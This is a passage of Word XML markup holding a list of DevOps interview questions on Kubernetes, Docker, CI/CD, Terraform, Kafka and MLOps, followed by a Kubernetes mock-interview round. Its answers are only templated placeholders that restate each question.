        <w:t>Q33. Explain Ingress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. Explain Network Policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. How do you troubleshoot CrashLoopBackOff?</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CrashLoopBackOff?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. How do you debug a pending pod?</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debug a pending pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. What commands do you use for troubleshooting?</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commands do you use for troubleshooting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Explain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Helm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. How have you organized Helm charts?</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organized Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. How do you deploy applications using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applications using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Explain Docker architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. What is the difference between Docker and Kubernetes?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Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. Explain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Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What are Docker volumes?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Docker volumes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. What are Docker networks?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Docker networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. Explain multi-stage Docker builds.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multi-stage Docker builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. Explain your CI/CD pipeline.</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your CI/CD pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Which CI/CD tools have you used?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CI/CD tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Explain Jenkins pipeline.</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Jenkins pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Explain GitLab CI.</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GitLab CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Explain Azure DevOps pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</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 How do you handle deployment failures?</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deployment failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. How do you implement rollback?</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implement rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. How do you deploy to Kubernetes?</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to Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Explain Terraform state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Q56. What is a remote backend?</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remote backend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. How do you manage Terraform state?</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Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. What are Terraform modules?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Q59. Explain lifecycle in Terraform.</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lifecycle in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. How do you manage secrets?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secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. How do you resolve state conflicts?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resolve state conflicts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. Which monitoring tools have you used?</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used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. Explain ELK Stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring &amp; Logging</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 Explain Grafana.</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Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. How do you troubleshoot production issues?</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production issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. How do you investigate logs?</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investigate logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. Explain Git branching strategy.</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 branching strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. What is the difference between merge and rebase?</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merge and rebase?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Explain GitHub workflow.</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GitHub workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. How do you resolve merge conflicts?</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resolve merge conflicts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Which Linux commands do you use daily?</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Linux commands do you use daily?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. How do you check CPU, memory, and disk usage?</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check CPU, memory, and disk usage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. How do you troubleshoot a Linux server?</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Linux server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q74. Which databases have you worked on?</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databases have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q75. Explain PostgreSQL basics.</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PostgreSQL basics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q76. How do you troubleshoot database connectivity?</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database connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q77. Have you worked with Kafka?</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Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q78. Explain Kafka architecture.</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Kafka architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q79. What are topics, partitions, and consumer groups?</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topics, partitions, and consumer groups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q80. Tell me about a critical production issue you resolved.</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critical production issue you resolved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q81. What was the toughest issue you have handled?</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toughest issue you have handled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q82. Describe a time you had to make a trade-off under pressure.</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a time you had to make a trade-off under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q83. What production issue did you troubleshoot from start to finish?</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production issue did you troubleshoot from start to finish?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q84. How do you perform root cause analysis (RCA)?</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perform root cause analysis (RCA)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q85. How do you prioritize incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios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Q86. Tell me about a challenging project.</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challenging project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q87. Tell me about a conflict with a team member.</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conflict with a team member.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q88. How do you handle pressure?</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pressure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q89. What is your biggest achievement?</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biggest achievement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q90. What are your strengths?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strengths?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q91. What are your weaknesses?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weaknesses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q92. Where do you see yourself in five years?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see yourself in five years?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q93. What is MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q94. Have you worked with MLflow?</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MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q95. How would you deploy an ML model?</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an ML model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q96. How would you monitor ML models?</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monitor ML models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q97. What is Kubeflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps / AI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q98. How would you build an end-to-end MLOps pipeline?</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build an end-to-end MLOps pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 63 - Kubernetes Fundamentals Transcript Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How does Kubernetes FQDN resolve to an IP address? Explain service.namespace.svc.cluster.local and how DNS resolves the service name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes DNS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Kubernetes FQDN resolve to an IP address? Explain service.namespace.svc.cluster.local and how DNS resolves the service name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the role of CoreDNS in Kubernetes? How does CoreDNS resolve service names, and does it communicate with the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CoreDNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CoreDNS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CoreDNS in Kubernetes? How does CoreDNS resolve service names, and does it communicate with the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Is CoreDNS a bridge between etcd and the Kubernetes API server? If not, what is its actual role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CoreDNS/API Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CoreDNS/API Server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CoreDNS a bridge between etcd and the Kubernetes API server? If not, what is its actual role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is RBAC in Kubernetes? Why do we use RBAC? Explain Role, ClusterRole, RoleBinding, and ClusterRoleBinding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes RBAC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes RBAC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RBAC in Kubernetes? Why do we use RBAC? Explain Role, ClusterRole, RoleBinding, and ClusterRoleBinding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Suppose an application goes down in a Kubernetes cluster. How does the master or control plane know that the application is down? How does the signal reach the control plane?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Health</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Health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an application goes down in a Kubernetes cluster. How does the master or control plane know that the application is down? How does the signal reach the control plane?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Which component detects that a pod or application has become unhealthy, and what is the role of kubelet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubelet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubelet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component detects that a pod or application has become unhealthy, and what is the role of kubelet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Is kubelet a worker node component or a master/control plane component?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubelet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubelet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kubelet a worker node component or a master/control plane component?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How does kubelet communicate with the control plane, and what is the role of the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubelet/API Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubelet/API Server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kubelet communicate with the control plane, and what is the role of the API server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain the Liveness Probe. When is it used, and what happens if it fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Liveness Probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Liveness Probe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Liveness Probe. When is it used, and what happens if it fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Explain the Readiness Probe. How is it different from the Liveness Probe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Readiness Probe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
